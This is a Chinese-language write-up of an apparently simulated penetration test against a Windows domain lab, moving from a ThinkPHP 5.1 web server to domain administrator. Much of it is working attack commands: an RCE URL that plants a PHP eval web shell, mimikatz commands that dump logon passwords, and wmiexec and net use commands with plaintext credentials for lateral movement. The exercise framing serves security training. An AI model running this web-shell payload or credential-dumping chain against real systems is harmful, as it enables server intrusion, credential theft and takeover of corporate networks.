一次模拟实战(下)-域环境渗透

【信息收集】

访问80端口发现网站使用了thinkphp5.1版本

【漏洞利用】

搜索thinkphp使用的事5.1版本
https://www.vulnspy.com/cn-thinkphp-5.x-rce/

写入一句话：

http://192.168.43.35/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=x.php&vars[1][]=%3C?php%20@eval($_POST[%27cmd%27]);?%3E

蚁剑链接

【内网信息收集】

发现是域环境，但是域内主机不多

【横向移动】

上传mimikatz 抓取当前主机哈希

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt`

type log.txt

这是抓取到本地PC账户和administrator用户名和密码

因为开启3389，使用administrator用户连接

这时候上传PsLoggedon （它通过检验注册表里HKEY_USERS的key值来查询谁登陆过机器，同样也调用到了NetSessionEnum API）

PsLoggedon.exe /accetpeula administrator

这时我们发现域控登录过“CHENGCHENG”这台主机

查找”CHENGCHENG”主机IP 为“172.16.12.18”

我们发下CHENGCHENG本地管理员用户和CHANGSHENG本地管理员用户密码一样！

上传“wmiexec”做挂载，目的上传mimikatz

wmiexec.exe CHENGCHENG/administrator:110110zccZCC@172.16.12.18 "hostname"

挂载CHENGCHENG远程的C盘到本地f盘

net use f: \\chengcheng\c$ 110110zccZCC /user:chengcheng\administrator

将mimikatz拷贝至CHENGCHENG C:

执行mimikatz
wmiexec.exe chengcheng/administrator:110110zccZCC@172.16.12.18 "c:\phpstudy_pro\WWW\thinkphp-5.1.29\html\public\run.bat"
至此，成功拿下域管理员